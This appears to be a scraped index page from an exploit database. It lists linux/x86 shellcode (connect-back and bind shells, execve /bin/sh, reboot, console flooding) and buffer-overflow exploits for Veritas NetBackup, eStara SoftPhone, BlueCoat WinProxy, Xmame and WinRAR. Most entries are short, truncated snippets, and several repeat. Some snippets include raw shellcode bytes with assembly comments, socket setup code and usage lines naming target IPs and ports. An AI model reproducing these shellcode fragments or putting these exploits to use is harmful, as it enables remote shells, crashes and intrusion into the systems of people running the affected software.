linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes

Exploit for linux/x86 platform in category shellcode ============================================================= linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes ============================================================= / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - ...

linux/x86 Bind /bin/sh to 31337/tcp + fork() 98 bytes

Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes ===================================================== / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode =...

linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes

Exploit for linux/x86 platform in category shellcode ==================================================================== linux/x86 cat /dev/urandom /dev/console, just for kicks - 63 bytes ==================================================================== / linux/x86 cat /dev/urandom...

linux/x86 eject/close cd-rom loop (follows /dev/cdrom symlink) 45 bytes

Exploit for linux/x86 platform in category shellcode ======================================================================= linux/x86 eject/close cd-rom loop follows /dev/cdrom symlink 45 bytes ======================================================================= / linux/x86 eject & close cd-r...

linux/x86 reboot() - 20 bytes

Exploit for linux/x86 platform in category shellcode ============================= linux/x86 reboot - 20 bytes ============================= / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %e...

linux/x86 anti-debug trick (INT 3h trap) + execve /bin/sh 39 bytes

Exploit for linux/x86 platform in category shellcode ================================================================== linux/x86 anti-debug trick INT 3h trap + execve /bin/sh 39 bytes ================================================================== / linux/x86 anti-debug trick INT 3h trap +...

linux/x86 execve(/bin/sh) / PUSH - 23 bytes

No description provided by source. / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik [email protected] / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push...

linux/x86 normal exit w/ random (so to speak) return value 5 bytes

No description provided by source. / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik [email protected] / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; //...

Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow

Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow / DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE...

Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit

No description provided by source. / DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE C:\NetBackupnb 192.168.0.2 4444...

Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow

/ DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE C:\NetBackupnb 192.168.0.2 4444 192.168.0.200 0 Veritas NetBackup v4/...

Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit

Exploit for unknown platform in category remote exploits ============================================================== Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit ============================================================== / DESCRIPTION Veritas NetBackup Stack Overflow...

Xmame 0.102 (-lang) Local Buffer Overflow Exploit (c code)

Exploit for linux platform in category local exploits ========================================================== Xmame 0.102 -lang Local Buffer Overflow Exploit c code ========================================================== / Xmame 0.102 -lang Local Buffer Overflow Exploit Coded BY Qnix...

eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)

eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow 2 !/usr/bin/perl -s damn-hippie.pl by kokanin google estara, it shows sip stuff and a hippie Remote "estara softphone" exploit, executable version info = 3.0.1.2 kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060...

eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit (2)

No description provided by source. !/usr/bin/perl -s damn-hippie.pl by kokanin google estara, it shows sip stuff and a hippie Remote "estara softphone" exploit, executable version info = 3.0.1.2 kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060 Lets face it, most user...

BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit

No description provided by source. !perl "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit Author: FistFucker aka FistFuXXer e-Mail: [email protected] Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364 CVE info: CAN-2005-4085 use IO::Socket; destination IP addres...

BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH)

!perl "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit Author: FistFucker aka FistFuXXer e-Mail: [email protected] Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364 CVE info: CAN-2005-4085 use IO::Socket; destination IP address $ip = '127.0.0.1'; destination TC...

BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit

Exploit for unknown platform in category remote exploits ================================================================== BlueCoat WinProxy 6.0 R1c Host Remote Stack/SEH Overflow Exploit ================================================================== !perl "WinProxy 6.0 R1c" Remote Stack/SEH...

Alpha2 Alphanumeric Mixedcase Encoder

Encodes payloads as alphanumeric mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite. A pure alpha encoder is impossible without having a register that points at or near the shellcode. In a default configuration the first few bytes at the beginning are an fnstenv getpc stub the sam...

WinRAR 3.30 - Filename Local Buffer Overflow (1)

WinRAR 3.30 - Filename Local Buffer Overflow 1 / WinRAR Buffer Overflow 3.30 Exploit Bug founded by: Vredited By Alpha Programmer & Trap-Set U.H Team Exploit made by: K4P0 Contact: [email protected] / include include int mainvoid char EvilBuff1024; // Normal cmd.exe shellcode. char shellcode =...